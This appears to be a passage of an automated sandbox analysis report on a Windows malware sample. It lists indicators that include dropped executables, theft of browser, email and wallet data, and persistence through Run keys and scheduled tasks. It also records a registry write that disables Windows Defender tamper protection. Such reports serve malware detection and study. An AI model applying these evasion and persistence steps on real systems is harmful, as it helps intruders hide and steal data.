Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108730101\39510de4d4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108760101\eefeac8dd1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\QLW5JVNEJIJD4BSUTO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108760101\eefeac8dd1.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\QLW5JVNEJIJD4BSUTO.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108730101\39510de4d4.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Build.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32376a73b4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108750101\\32376a73b4.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eefeac8dd1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108760101\\eefeac8dd1.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\db46c2dee3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108770101\\db46c2dee3.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\972bad5e2c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108780101\\972bad5e2c.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\947ced5026.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\947ced5026.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\QLW5JVNEJIJD4BSUTO.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108760101\eefeac8dd1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108730101\39510de4d4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108770101\db46c2dee3.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe N/A
